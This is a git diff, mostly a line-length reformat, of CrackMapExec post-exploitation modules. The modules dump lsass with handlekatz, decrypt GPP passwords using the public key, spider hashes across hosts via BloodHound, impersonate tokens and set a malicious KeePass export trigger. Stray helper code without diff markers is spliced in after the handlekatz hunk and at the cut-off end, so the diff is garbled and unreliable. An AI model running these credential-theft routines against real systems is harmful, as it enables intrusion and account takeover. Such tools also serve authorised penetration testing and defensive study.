connection.domain + context.log.debug("Detecting installed services on {} using LsarLookupNames()...".format(target)) try: lsa = LsaLookupNames( @@ -62,9 +54,7 @@ class CMEModule: for service in product["services"]: try: lsa.LsarLookupNames(dce, policyHandle, service["name"]) - context.log.display( - f"Detected installed service on {connection.host}: {product['name']} {service['description']}" - ) + context.log.display(f"Detected installed service on {connection.host}: {product['name']} {service['description']}") if product["name"] not in results: results[product["name"]] = {"services": []} results[product["name"]]["services"].append(service) @@ -74,18 +64,14 @@ class CMEModule: except Exception as e: context.log.fail(str(e)) - context.log.display( - f"Detecting running processes on {connection.host} by enumerating pipes..." 
- ) + context.log.display(f"Detecting running processes on {connection.host} by enumerating pipes...") try: for f in connection.conn.listPath("IPC$", "\\*"): fl = f.get_longname() for i, product in enumerate(conf["products"]): for pipe in product["pipes"]: if pathlib.PurePath(fl).match(pipe["name"]): - context.log.debug( - f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})" - ) + context.log.debug(f"{product['name']} running claim found on {connection.host} by existing pipe {fl} (likely processes: {pipe['processes']})") if product["name"] not in results: results[product["name"]] = {} if "pipes" not in results[product["name"]]: @@ -168,9 +154,7 @@ class LsaLookupNames: # Authenticate if specified if self.authn and hasattr(rpc_transport, "set_credentials"): # This method exists only for selected protocol sequences. - rpc_transport.set_credentials( - self.username, self.password, self.domain, self.lmhash, self.nthash - ) + rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash) if self.doKerberos: rpc_transport.set_kerberos(self.doKerberos, kdcHost=self.dcHost) @@ -323,9 +307,7 @@ conf = { }, { "name": "Carbon Black App Control", - "services": [ - {"name": "Parity", "description": "Carbon Black App Control Agent"} - ], + "services": [{"name": "Parity", "description": "Carbon Black App Control Agent"}], "pipes": [], }, { diff --git a/cme/modules/enum_dns.py b/cme/modules/enum_dns.py index 49c572d3..0e0c2ae0 100644 --- a/cme/modules/enum_dns.py +++ b/cme/modules/enum_dns.py @@ -33,9 +33,7 @@ class CMEModule: def on_admin_login(self, context, connection): if not self.domains: domains = [] - output = connection.wmi( - "Select Name FROM MicrosoftDNS_Zone", "root\\microsoftdns" - ) + output = connection.wmi("Select Name FROM MicrosoftDNS_Zone", "root\\microsoftdns") if output: for result in output: @@ -72,8 +70,6 @@ class CMEModule: context.log.highlight("\t" + d) data += "\t" + d + "\n" - log_name = "DNS-Enum-{}-{}.log".format( - connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S") - ) + log_name = "DNS-Enum-{}-{}.log".format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(data, log_name) context.log.display(f"Saved raw output to {log_name}") diff --git a/cme/modules/example_module.py b/cme/modules/example_module.py index f8a84dfa..4cab21d3 100644 --- a/cme/modules/example_module.py +++ b/cme/modules/example_module.py @@ -12,9 +12,7 @@ class CMEModule: description = "I do something" supported_protocols = [] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? def __init__(self, context=None, module_options=None): self.context = context diff --git a/cme/modules/firefox.py b/cme/modules/firefox.py index c3fdee96..c58de4e1 100644 --- a/cme/modules/firefox.py +++ b/cme/modules/firefox.py @@ -14,9 +14,7 @@ class CMEModule: description = "Dump credentials from Firefox" supported_protocols = ["smb"] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? 
def options(self, context, module_options): """Dump credentials from Firefox""" diff --git a/cme/modules/get-desc-users.py b/cme/modules/get-desc-users.py index 91d340f2..1832b0bd 100644 --- a/cme/modules/get-desc-users.py +++ b/cme/modules/get-desc-users.py @@ -17,9 +17,7 @@ class CMEModule: description = "Get description of the users. May contained password" supported_protocols = ["ldap"] opsec_safe = True # Does the module touch disk? - multiple_hosts = ( - True # Does it make sense to run this module on multiple hosts at a time? - ) + multiple_hosts = True # Does it make sense to run this module on multiple hosts at a time? def options(self, context, module_options): """ @@ -36,11 +34,7 @@ class CMEModule: self.MINLENGTH = module_options["MINLENGTH"] if "PASSWORDPOLICY" in module_options: self.PASSWORDPOLICY = True - self.regex = re.compile( - "((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" - + self.MINLENGTH - + ",}" - ) # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following + self.regex = re.compile("((?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*\d)|(?=[^ ]*[a-z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*\d)(?=[^ ]*[^\w \n])|(?=[^ ]*[A-Z])(?=[^ ]*[a-z])(?=[^ ]*[^\w \n]))[^ \n]{" + self.MINLENGTH + ",}") # Credit : https://stackoverflow.com/questions/31191248/regex-password-must-have-at-least-3-of-the-4-of-the-following def on_login(self, context, connection): """Concurrent. Required if on_admin_login is not present. This gets called on each authenticated connection""" @@ -56,9 +50,7 @@ class CMEModule: ) except ldap_impacket.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - context.log.debug( - "sizeLimitExceeded exception caught, giving up and processing the data received" - ) + context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received") # We reached the sizeLimit, process the answers we have already and that's it. 
Until we implement # paged queries resp = e.getAnswers() @@ -84,17 +76,13 @@ class CMEModule: answers.append([sAMAccountName, description]) except Exception as e: context.log.debug("Exception:", exc_info=True) - context.log.debug( - "Skipping item, cannot process due to error %s" % str(e) - ) + context.log.debug("Skipping item, cannot process due to error %s" % str(e)) pass answers = self.filter_answer(context, answers) if len(answers) > 0: context.log.success("Found following users: ") for answer in answers: - context.log.highlight( - "User: {} description: {}".format(answer[0], answer[1]) - ) + context.log.highlight("User: {} description: {}".format(answer[0], answer[1])) def filter_answer(self, context, answers): # No option to filter @@ -119,16 +107,9 @@ class CMEModule: if self.regex.search(description): conditionPasswordPolicy = True - if ( - self.FILTER - and conditionFilter - and self.PASSWORDPOLICY - and conditionPasswordPolicy - ): + if self.FILTER and conditionFilter and self.PASSWORDPOLICY and conditionPasswordPolicy: answersFiltered.append([answer[0], description]) - elif ( - not self.FILTER and self.PASSWORDPOLICY and conditionPasswordPolicy - ): + elif not self.FILTER and self.PASSWORDPOLICY and conditionPasswordPolicy: answersFiltered.append([answer[0], description]) elif not self.PASSWORDPOLICY and self.FILTER and conditionFilter: answersFiltered.append([answer[0], description]) diff --git a/cme/modules/get_netconnections.py b/cme/modules/get_netconnections.py index 8ee9e1d5..df8c636e 100755 --- a/cme/modules/get_netconnections.py +++ b/cme/modules/get_netconnections.py @@ -27,19 +27,13 @@ class CMEModule: def on_admin_login(self, context, connection): data = [] - cards = connection.wmi( - f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration" - ) + cards = connection.wmi(f"select DNSDomainSuffixSearchOrder, IPAddress from win32_networkadapterconfiguration") for c in cards: if c["IPAddress"].get("value"): - context.log.success( - f"IP Address: {c['IPAddress']['value']}\tSearch Domain: {c['DNSDomainSuffixSearchOrder']['value']}" - ) + context.log.success(f"IP Address: {c['IPAddress']['value']}\tSearch Domain: {c['DNSDomainSuffixSearchOrder']['value']}") data.append(cards) - log_name = "network-connections-{}-{}.log".format( - connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S") - ) + log_name = "network-connections-{}-{}.log".format(connection.args.target[0], datetime.now().strftime("%Y-%m-%d_%H%M%S")) write_log(json.dumps(data), log_name) context.log.display("Saved raw output to {}".format(log_name)) diff --git a/cme/modules/gpp_password.py b/cme/modules/gpp_password.py index 251e6c89..136d0251 100644 --- a/cme/modules/gpp_password.py +++ b/cme/modules/gpp_password.py @@ -28,9 +28,7 @@ class CMEModule: for share in shares: if share["name"] == "SYSVOL" and "READ" in share["access"]: context.log.success("Found SYSVOL share") - context.log.display( - "Searching for potential XML files containing passwords" - ) + context.log.display("Searching for potential XML files containing passwords") paths = connection.spider( "SYSVOL", @@ -90,9 +88,7 @@ class CMEModule: password = self.decrypt_cpassword(props["cpassword"]) - context.log.success( - "Found credentials in {}".format(path) - ) + context.log.success("Found credentials in {}".format(path)) context.log.highlight("Password: {}".format(password)) for k, v in props.items(): if k != "cpassword": @@ -111,9 +107,7 @@ class CMEModule: # Stolen from 
hhttps://gist.github.com/andreafortuna/4d32100ae03abead52e8f3f61ab70385 # From MSDN: http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2 - key = unhexlify( - "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b" - ) + key = unhexlify("4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b") cpassword += "=" * ((4 - len(cpassword) % 4) % 4) password = b64decode(cpassword) IV = "\x00" * 16 diff --git a/cme/modules/groupmembership.py b/cme/modules/groupmembership.py index 7d1bae9c..459d6032 100644 --- a/cme/modules/groupmembership.py +++ b/cme/modules/groupmembership.py @@ -32,9 +32,7 @@ class CMEModule: exit(1) self.user = module_options["USER"] else: - context.log.fail( - "Missing USER option, use --options to list available parameters" - ) + context.log.fail("Missing USER option, use --options to list available parameters") exit(1) def on_login(self, context, connection): @@ -51,9 +49,7 @@ class CMEModule: ) except ldap_impacket.LDAPSearchError as e: if e.getErrorString().find("sizeLimitExceeded") >= 0: - context.log.debug( - "sizeLimitExceeded exception caught, giving up and processing the data received" - ) + context.log.debug("sizeLimitExceeded exception caught, giving up and processing the data received") # We reached the sizeLimit, process the answers we have already and that's it. Until we implement # paged queries resp = e.getAnswers() @@ -85,14 +81,10 @@ class CMEModule: except Exception as e: context.log.debug("Exception:", exc_info=True) - context.log.debug( - "Skipping item, cannot process due to error %s" % str(e) - ) + context.log.debug("Skipping item, cannot process due to error %s" % str(e)) pass if len(memberOf) > 0: - context.log.success( - "User: {} is member of following groups: ".format(self.user) - ) + context.log.success("User: {} is member of following groups: ".format(self.user)) for group in memberOf: # Split the string on the "," character to get a list of the group name and parent group names group_parts = group.split(",") diff --git a/cme/modules/handlekatz.py b/cme/modules/handlekatz.py index 0b0fa945..336eaf08 100644 --- a/cme/modules/handlekatz.py +++ b/cme/modules/handlekatz.py @@ -56,17 +56,11 @@ class CMEModule: with open(self.handlekatz_path + self.handlekatz, "wb") as handlekatz: handlekatz.write(self.handlekatz_embeded) - context.log.display( - f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}" - ) + context.log.display(f"Copy {self.handlekatz_path + self.handlekatz} to {self.tmp_dir}") with open(self.handlekatz_path + self.handlekatz, "rb") as handlekatz: try: - connection.conn.putFile( - self.share, self.tmp_share + self.handlekatz, handlekatz.read - ) - context.log.success( - f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}" - ) + connection.conn.putFile(self.share, self.tmp_share + self.handlekatz, handlekatz.read) + context.log.success(f"[OPSEC] Created file {self.handlekatz} on the \\\\{self.share}{self.tmp_share}") except Exception as e: context.log.fail(f"Error writing file to share {self.share}: {e}") @@ -85,15 +79,7 @@ class CMEModule: pid = p.split(",")[1][1:-1] context.log.debug(f"pid: {pid}") - command = ( - self.tmp_dir - + self.handlekatz - + " --pid:" - + pid - + " --outfile:" - + self.tmp_dir - + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log" - ) + command = self.tmp_dir + self.handlekatz + " --pid:" + pid + " --outfile:" + self.tmp_dir + "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log" 
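# The handlekatz command assembled above can also be written as a single f-string; a
# sketch only, with tmp_dir/handlekatz/pid standing in for the attributes and variable
# used by this module (the resulting string is assumed to be identical):
def build_handlekatz_command(tmp_dir, handlekatz, pid):
    return (
        f"{tmp_dir}{handlekatz} --pid:{pid} --outfile:{tmp_dir}"
        "%COMPUTERNAME%-%PROCESSOR_ARCHITECTURE%-%USERDOMAIN%.log"
    )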
context.log.display(f"Executing command {command}") p = connection.execute(command, True) @@ -118,32 +104,22 @@ class CMEModule: with open(self.dir_result + machine_name, "wb+") as dump_file: try: - connection.conn.getFile( - self.share, self.tmp_share + machine_name, dump_file.write - ) - context.log.success( - f"Dumpfile of lsass.exe was transferred to {self.dir_result + machine_name}" - ) + connection.conn.getFile(self.share, self.tmp_share + machine_name, dump_file.write) + context.log.success(f"Dumpfile of lsass.exe was transferred to {self.dir_result + machine_name}") except Exception as e: context.log.fail(f"Error while get file: {e}") try: connection.conn.deleteFile(self.share, self.tmp_share + self.handlekatz) - context.log.success( - f"Deleted handlekatz file on the {self.share} share" - ) + context.log.success(f"Deleted handlekatz file on the {self.share} share") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting handlekatz file on share {self.share}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting handlekatz file on share {self.share}: {e}") try: connection.conn.deleteFile(self.share, self.tmp_share + machine_name) context.log.success(f"Deleted lsass.dmp file on the {self.share} share") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting lsass.dmp file on share {self.share}: {e}") h_in = open(self.dir_result + machine_name, "rb") h_out = open(self.dir_result + machine_name + ".decode", "wb") @@ -151,13 +127,9 @@ class CMEModule: bytes_in = bytearray(h_in.read()) bytes_in_len = len(bytes_in) - context.log.display( - f"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)" - ) + context.log.display(f"Deobfuscating, this might take a while (size: {bytes_in_len} bytes)") - chunks = [ - bytes_in[i : i + 1000000] for i in range(0, bytes_in_len, 1000000) - ] + chunks = [bytes_in[i : i + 1000000] for i in range(0, bytes_in_len, 1000000)] for chunk in chunks: for i in range(0, len(chunk)): chunk[i] ^= 0x41 @@ -184,28 +156,17 @@ class CMEModule: ] for luid in pypy_parse.logon_sessions: for ssp in ssps: - for cred in getattr( - pypy_parse.logon_sessions[luid], ssp, [] - ): + for cred in getattr(pypy_parse.logon_sessions[luid], ssp, []): domain = getattr(cred, "domainname", None) username = getattr(cred, "username", None) password = getattr(cred, "password", None) NThash = getattr(cred, "NThash", None) if NThash is not None: NThash = NThash.hex() - if ( - username - and (password or NThash) - and "$" not in username - ): + if username and (password or NThash) and "$" not in username: print_pass = password if password else NThash - context.log.highlight( - domain + "\\" + username + ":" + print_pass - ) - if ( - "." not in domain - and domain.upper() in connection.domain.upper() - ): + context.log.highlight(domain + "\\" + username + ":" + print_pass) + if "." 
not in domain and domain.upper() in connection.domain.upper(): domain = connection.domain credz_bh.append( { diff --git a/cme/modules/hash_spider.py b/cme/modules/hash_spider.py index b1de8cff..1862adc1 100644 --- a/cme/modules/hash_spider.py +++ b/cme/modules/hash_spider.py @@ -40,9 +40,7 @@ def neo4j_local_admins(context, driver): global admin_results try: session = driver.session() - admins = session.run( - "MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC" - ) # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts + admins = session.run("MATCH (c:Computer) OPTIONAL MATCH (u1:User)-[:AdminTo]->(c) OPTIONAL MATCH (u2:User)-[:MemberOf*1..]->(:Group)-[:AdminTo]->(c) WITH COLLECT(u1) + COLLECT(u2) AS TempVar,c UNWIND TempVar AS Admins RETURN c.name AS COMPUTER, COUNT(DISTINCT(Admins)) AS ADMIN_COUNT,COLLECT(DISTINCT(Admins.name)) AS USERS ORDER BY ADMIN_COUNT DESC") # This query pulls all PCs and their local admins from Bloodhound. Based on: https://github.com/xenoscr/Useful-BloodHound-Queries/blob/master/List-Queries.md and other similar posts context.log.success("Admins and PCs obtained.") except Exception: context.log.fail("Could not pull admins") @@ -51,9 +49,7 @@ def neo4j_local_admins(context, driver): def create_db(local_admins, dbconnection, cursor): - cursor.execute( - """CREATE TABLE if not exists pc_and_admins ("pc_name" TEXT UNIQUE, "local_admins" TEXT, "dumped" TEXT)""" - ) + cursor.execute("""CREATE TABLE if not exists pc_and_admins ("pc_name" TEXT UNIQUE, "local_admins" TEXT, "dumped" TEXT)""") for result in local_admins: cursor.execute( "INSERT OR IGNORE INTO pc_and_admins(pc_name, local_admins, dumped) VALUES(?, ?, ?)", @@ -66,18 +62,14 @@ def create_db(local_admins, dbconnection, cursor): ), ) dbconnection.commit() - cursor.execute( - """CREATE TABLE if not exists admin_users("username" TEXT UNIQUE, "hash" TEXT, "password" TEXT)""" - ) + cursor.execute("""CREATE TABLE if not exists admin_users("username" TEXT UNIQUE, "hash" TEXT, "password" TEXT)""") admin_users = [] for result in local_admins: for user in result.get("USERS"): if user not in admin_users: admin_users.append(user) for user in admin_users: - cursor.execute( - """INSERT OR IGNORE INTO admin_users(username) VALUES(?)""", [user] - ) + cursor.execute("""INSERT OR IGNORE INTO admin_users(username) VALUES(?)""", [user]) dbconnection.commit() @@ -92,50 +84,29 @@ def process_creds(context, connection, credentials_data, dbconnection, cursor, d nthash = result["nthash"] password = result["password"] if result["password"] is not None: - context.log.highlight( - f"Found a cleartext password for: {username}:{password}. Adding to the DB and marking user as owned in BH." - ) + context.log.highlight(f"Found a cleartext password for: {username}:{password}. Adding to the DB and marking user as owned in BH.") cursor.execute( - "UPDATE admin_users SET password = ? WHERE username LIKE '" - + username - + "%'", + "UPDATE admin_users SET password = ? 
WHERE username LIKE '" + username + "%'", [password], ) username = f"{username.upper()}@{context.log.extra['host'].upper()}" dbconnection.commit() session = driver.session() - session.run( - 'MATCH (u) WHERE (u.name = "' - + username - + '") SET u.owned=True RETURN u,u.name,u.owned' - ) - if ( - nthash == "aad3b435b51404eeaad3b435b51404ee" - or nthash == "31d6cfe0d16ae931b73c59d7e0c089c0" - ): + session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned') + if nthash == "aad3b435b51404eeaad3b435b51404ee" or nthash == "31d6cfe0d16ae931b73c59d7e0c089c0": context.log.fail(f"Hash for {username} is expired.") elif username not in found_users and nthash is not None: - context.log.highlight( - f"Found hashes for: '{username}:{nthash}'. Adding them to the DB and marking user as owned in BH." - ) + context.log.highlight(f"Found hashes for: '{username}:{nthash}'. Adding them to the DB and marking user as owned in BH.") found_users.append(username) cursor.execute( - "UPDATE admin_users SET hash = ? WHERE username LIKE '" - + username - + "%'", + "UPDATE admin_users SET hash = ? WHERE username LIKE '" + username + "%'", [nthash], ) dbconnection.commit() username = f"{username.upper()}@{context.log.extra['host'].upper()}" session = driver.session() - session.run( - 'MATCH (u) WHERE (u.name = "' - + username - + '") SET u.owned=True RETURN u,u.name,u.owned' - ) - path_to_da = session.run( - "MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p" - ) + session.run('MATCH (u) WHERE (u.name = "' + username + '") SET u.owned=True RETURN u,u.name,u.owned') + path_to_da = session.run("MATCH p=shortestPath((n)-[*1..]->(m)) WHERE n.owned=true AND m.name=~ '.*DOMAIN ADMINS.*' RETURN p") paths = [record for record in path_to_da.data()] for path in paths: @@ -144,9 +115,7 @@ def process_creds(context, connection, credentials_data, dbconnection, cursor, d for item in value: if type(item) == dict: if {item["name"]} not in reported_da: - context.log.success( - f"You have a valid path to DA as {item['name']}." - ) + context.log.success(f"You have a valid path to DA as {item['name']}.") reported_da.append({item["name"]}) exit() @@ -167,9 +136,7 @@ def initial_run(connection, cursor): class CMEModule: name = "hash_spider" - description = ( - "Dump lsass recursively from a given hash using BH to find local admins" - ) + description = "Dump lsass recursively from a given hash using BH to find local admins" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = True @@ -193,9 +160,7 @@ class CMEModule: self.reset_dumped = module_options.get("RESET_DUMPED", False) self.reset = module_options.get("RESET", False) - def run_lsassy( - self, context, connection, cursor - ): # copied and pasted from lsassy_dumper & added cursor + def run_lsassy(self, context, connection, cursor): # copied and pasted from lsassy_dumper & added cursor # lsassy uses a custom "success" level, which requires initializing its logger or an error will be thrown # lsassy also removes all other handlers and overwrites the formatter which is bad (we want ours) # so what we do is define "success" as a logging level, then do nothing with the output @@ -220,12 +185,8 @@ class CMEModule: domain=domain_name, ) if session.smb_session is None: - context.log.fail( - "Couldn't connect to remote host. Password likely expired/changed. Removing from DB." 
- ) - cursor.execute( - f"UPDATE admin_users SET hash = NULL WHERE username LIKE '{username}'" - ) + context.log.fail("Couldn't connect to remote host. Password likely expired/changed. Removing from DB.") + cursor.execute(f"UPDATE admin_users SET hash = NULL WHERE username LIKE '{username}'") return False dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method) if dumper is None: @@ -240,11 +201,7 @@ class CMEModule: ImpacketFile.delete(session, file.get_file_path()) if credentials is None: credentials = [] - credentials = [ - cred.get_object() - for cred in credentials - if not cred.get_username().endswith("$") - ] + credentials = [cred.get_object() for cred in credentials if not cred.get_username().endswith("$")] credentials_unique = [] credentials_output = [] for cred in credentials: @@ -271,21 +228,15 @@ class CMEModule: def spider_pcs(self, context, connection, cursor, dbconnection, driver): cursor.execute("SELECT * from admin_users WHERE hash is not NULL") compromised_users = cursor.fetchall() - cursor.execute( - "SELECT pc_name,local_admins FROM pc_and_admins WHERE dumped LIKE 'FALSE'" - ) + cursor.execute("SELECT pc_name,local_admins FROM pc_and_admins WHERE dumped LIKE 'FALSE'") admin_access = cursor.fetchall() for user in compromised_users: for pc in admin_access: if user[0] in pc[1]: - cursor.execute( - f"SELECT * FROM pc_and_admins WHERE pc_name = '{pc[0]}' AND dumped NOT LIKE 'TRUE'" - ) + cursor.execute(f"SELECT * FROM pc_and_admins WHERE pc_name = '{pc[0]}' AND dumped NOT LIKE 'TRUE'") more_to_dump = cursor.fetchall() if len(more_to_dump) > 0: - context.log.display( - f"User {user[0]} has more access to {pc[0]}. Attempting to dump." - ) + context.log.display(f"User {user[0]} has more access to {pc[0]}. Attempting to dump.") connection.domain = user[0].split("@")[1] setattr(connection, "host", pc[0].split(".")[0]) setattr(connection, "username", user[0].split("@")[0]) @@ -293,11 +244,7 @@ class CMEModule: setattr(connection, "nthash", user[1]) try: self.run_lsassy(context, connection, cursor) - cursor.execute( - "UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" - + pc[0] - + "%'" - ) + cursor.execute("UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '" + pc[0] + "%'") process_creds( context, @@ -307,15 +254,11 @@ class CMEModule: cursor, driver, ) - self.spider_pcs( - context, connection, cursor, dbconnection, driver - ) + self.spider_pcs(context, connection, cursor, dbconnection, driver) except Exception: context.log.fail(f"Failed to dump lsassy on {pc[0]}") if len(admin_access) > 0: - context.log.fail( - "No more local admin access known. Please try re-running Bloodhound with newly found accounts." - ) + context.log.fail("No more local admin access known. 
Please try re-running Bloodhound with newly found accounts.") exit() def on_admin_login(self, context, connection): @@ -348,17 +291,13 @@ class CMEModule: neo4j_uri = connection.config.get("BloodHound", "bh_uri") neo4j_port = connection.config.get("BloodHound", "bh_port") neo4j_db = f"bolt://{neo4j_uri}:{neo4j_port}" - driver = GraphDatabase.driver( - neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False - ) + driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False) neo4j_conn(context, connection, driver) neo4j_local_admins(context, driver) create_db(admin_results, dbconnection, cursor) initial_run(connection, cursor) context.log.display("Running lsassy") self.run_lsassy(context, connection, cursor) - process_creds( - context, connection, credentials_data, dbconnection, cursor, driver - ) + process_creds(context, connection, credentials_data, dbconnection, cursor, driver) context.log.display("🕷️ Starting to spider 🕷️") self.spider_pcs(context, connection, cursor, dbconnection, driver) diff --git a/cme/modules/impersonate.py b/cme/modules/impersonate.py index 0653ef21..38c4733b 100644 --- a/cme/modules/impersonate.py +++ b/cme/modules/impersonate.py @@ -10,9 +10,7 @@ from os import path class CMEModule: name = "impersonate" - description = ( - "List and impersonate tokens to run command as locally logged on users" - ) + description = "List and impersonate tokens to run command as locally logged on users" supported_protocols = ["smb"] opsec_safe = True # could be flagged multiple_hosts = True @@ -63,9 +61,7 @@ class CMEModule: context.log.display(f"Uploading {self.impersonate}") with open(file_to_upload, "rb") as impersonate: try: - connection.conn.putFile( - self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read - ) + connection.conn.putFile(self.share, f"{self.tmp_share}{self.impersonate}", impersonate.read) context.log.success(f"Impersonate binary successfully uploaded") except Exception as e: context.log.fail(f"Error writing file to share {self.tmp_share}: {e}") @@ -89,12 +85,8 @@ class CMEModule: if impersonated_user: context.log.display(f"Executing {self.cmd} as {impersonated_user}") - command = ( - f'{self.tmp_dir}Impersonate.exe exec {self.token} "{self.cmd}"' - ) - for line in connection.execute( - command, True, methods=["smbexec"] - ).splitlines(): + command = f'{self.tmp_dir}Impersonate.exe exec {self.token} "{self.cmd}"' + for line in connection.execute(command, True, methods=["smbexec"]).splitlines(): context.log.highlight(line) else: context.log.fail(f"Invalid token ID submitted") @@ -103,9 +95,7 @@ class CMEModule: context.log.fail(f"Error running command: {e}") finally: try: - connection.conn.deleteFile( - self.share, f"{self.tmp_share}{self.impersonate}" - ) + connection.conn.deleteFile(self.share, f"{self.tmp_share}{self.impersonate}") context.log.success(f"Impersonate binary successfully deleted") except Exception as e: context.log.fail(f"Error deleting Impersonate.exe on {self.share}: {e}") diff --git a/cme/modules/install_elevated.py b/cme/modules/install_elevated.py index 0e3b3d0b..9d00d688 100644 --- a/cme/modules/install_elevated.py +++ b/cme/modules/install_elevated.py @@ -59,24 +59,16 @@ class CMEModule: ) rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle) except rrp.DCERPCSessionError: - context.log.highlight( - "AlwaysInstallElevated Status: 1 (Enabled: Computer Only)" - ) + context.log.highlight("AlwaysInstallElevated Status: 1 (Enabled: Computer Only)") return if aie_user_value 
== 0: - context.log.highlight( - "AlwaysInstallElevated Status: 1 (Enabled: Computer Only)" - ) + context.log.highlight("AlwaysInstallElevated Status: 1 (Enabled: Computer Only)") else: context.log.highlight("AlwaysInstallElevated Status: 1 (Enabled)") finally: try: remote_ops.finish() except scmr.DCERPCSessionError as e: - context.log.debug( - f"Received SessionError while attempting to clean up logins: {e}" - ) + context.log.debug(f"Received SessionError while attempting to clean up logins: {e}") except Exception as e: - context.log.debug( - f"Received general exception while attempting to clean up logins: {e}" - ) + context.log.debug(f"Received general exception while attempting to clean up logins: {e}") diff --git a/cme/modules/keepass_discover.py b/cme/modules/keepass_discover.py index b3d894cd..4deddaaf 100644 --- a/cme/modules/keepass_discover.py +++ b/cme/modules/keepass_discover.py @@ -40,12 +40,8 @@ class CMEModule: if self.search_type == "ALL" or self.search_type == "PROCESS": # search for keepass process search_keepass_process_command_str = 'powershell.exe "Get-Process kee* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"' - search_keepass_process_output_csv = connection.execute( - search_keepass_process_command_str, True - ) # we return the powershell command as a CSV for easier column parsing - csv_reader = reader( - search_keepass_process_output_csv.split("\n"), delimiter="," - ) + search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True) # we return the powershell command as a CSV for easier column parsing + csv_reader = reader(search_keepass_process_output_csv.split("\n"), delimiter=",") next(csv_reader) # to skip the csv header line row_number = 0 # as csv_reader is an iterator we can't get its length without exhausting it for row in csv_reader: @@ -65,15 +61,9 @@ class CMEModule: # search for keepass-related files if self.search_type == "ALL" or self.search_type == "FILES": - search_keepass_files_payload = "Get-ChildItem -Path {} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName".format( - self.search_path - ) - search_keepass_files_cmd = 'powershell.exe "{}"'.format( - search_keepass_files_payload - ) - search_keepass_files_output = connection.execute( - search_keepass_files_cmd, True - ).split("\r\n") + search_keepass_files_payload = "Get-ChildItem -Path {} -Recurse -Force -Include ('KeePass.config.xml','KeePass.exe','*.kdbx') -ErrorAction SilentlyContinue | Select FullName -ExpandProperty FullName".format(self.search_path) + search_keepass_files_cmd = 'powershell.exe "{}"'.format(search_keepass_files_payload) + search_keepass_files_output = connection.execute(search_keepass_files_cmd, True).split("\r\n") found = False found_xml = False for file in search_keepass_files_output: diff --git a/cme/modules/keepass_trigger.py b/cme/modules/keepass_trigger.py index b8459ee1..f20314be 100644 --- a/cme/modules/keepass_trigger.py +++ b/cme/modules/keepass_trigger.py @@ -20,9 +20,7 @@ class CMEModule: """ name = "keepass_trigger" - description = ( - "Set up a malicious KeePass trigger to export the database in cleartext." - ) + description = "Set up a malicious KeePass trigger to export the database in cleartext." 
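# The keepass_discover hunk above (and this module's restart logic further below) parses
# "ConvertTo-CSV -NoTypeInformation" output from PowerShell with csv.reader; a standalone
# sketch of that pattern, assuming the raw command output is already available as text:
from csv import reader

def parse_powershell_csv(raw_output):
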